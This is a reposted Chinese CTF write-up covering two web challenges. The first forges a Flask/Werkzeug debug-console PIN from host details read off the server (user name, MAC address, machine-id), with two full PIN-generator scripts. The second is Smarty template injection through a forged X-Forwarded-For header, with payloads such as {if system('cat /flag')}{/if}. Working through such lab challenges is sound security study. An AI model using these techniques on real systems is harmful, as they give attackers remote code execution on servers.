Web题记

Web801

提示说此题姿势为flask算pin:pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式,可以理解为自带的webshell,大概了解了一下

probably_public_bits包含4个字段,分别为
username
modname
getattr(app, 'name', app.class.name)
getattr(mod, 'file', None)

其中username对应的值为当前主机的用户名
	linux可以查看/etc/passwd
	windows可以查看C:/Users目录
modname的值为'flask.app'
getattr(app, 'name', app.class.name)对应的值为'Flask'
getattr(mod, 'file', None)对应的值为app包的绝对路径

private_bits包含两个字段,分别为
str(uuid.getnode())
get_machine_id()

其中str(uuid.getnode())为网卡mac地址的十进制值
	在inux系统下得到存储位置为/sys/class/***/(对应网卡)/address 一般为eth0
	windows中cmd执行config /all查看
get_machine_id()的值为当前机器唯一的机器码
	对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id
	docker机则读取/proc/self/cgroup。
	windows的id在注册表中 (HKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->Cryptography)

 要计算出pin则必须知道所有的要素,即

username:启动flask的用户名 (/etc/passwd 读取)

modname:默认值flask.app

appname:默认flask

moddir:可通过报错信息得到 flask库下app.py的绝对路径,一般为/usr/local/lib/python{版本号}/site-packages/flask/app.py,在开启了debug的情况下可以通过报错获取,需要注意的是,在python2中,这个值是app.pyc,在python3中才是app.py

uuidnode:读取/sys/class/***/eth0/address MAC地址十六进制转化为十进制 根据网卡名称自行更改

machine_id: /etc/machine-id和/proc/sys/kernel/random/boot_id只要读取到其中一个,然后拼接/proc/self/cgroup

 

 username=root

app.py路径:/usr/local/lib/python3.8/site-packages/flask/app.py

 Mac地址需要转10进制:

 

 machine_id:225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185

跑PIN码:

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
private_bits = [
    '2485377621777',#  /sys/class/***/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185'#  /proc/self/cgroup
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)
#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'root'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
     '2485377621777',# str(uuid.getnode()),  /sys/class/***/ens33/address
     '225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185'# get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num
print(rv)

 访问/console

 Web802

无字母数字命令执行  P神文章

[CIS*** 2019华东南]Web11

知识点:smarty ssti RCE
    Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令
    XFF头代表了HTTP的请求端真实的IP,通过修改XXF头可以实现伪造IP
 模板引擎:

是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前

SSTI(Server-Side Template Injection):服务器端模板注入

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题

Smarty

是最流行的PHP模板语言之一,为不受信任的模板执行提供了安全模式。这会强制执行在 php 安全函数白名单中的函数,因此我们在模板中无法直接调用 php 中直接执行命令的函数(相当于存在了一个disable_function)

在构造payload前先看张图

 改图是用来测试是用的什么模板

 最下面可以看到使用了smarty模板,并且显示出了ip,ok啊,思路挺清晰了,通过XFF伪造,利用SSTI模板构造payload

现根据上图测试一下,执行成功

那就确定是存在ssti了,直接构造

X-Forwarded-For:{system('cat /flag')}

还有一种看别人的

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错

 可以利用这个来看一下版本

X-Forwarded-For:{$smarty.version}

3.1.30已废除{php}标签 ,这也是为什么刚才会报错,虽然php标签不能用,但是还有个{if}标签。
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用,如*||*,or,&&,and,is_array(), 等等

可以看到执行成功了,构造playload

X-Forwarded-For:{if system('cat /flag')}{/if}

或者

X-Forwarded-For:{if show_source('/flag')}{/if}

参考链接:[CIS***2019 华东南赛区]Web11 1-CSDN博客

转载请说明出处内容投诉
CSS教程_站长资源网 » Web题记

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买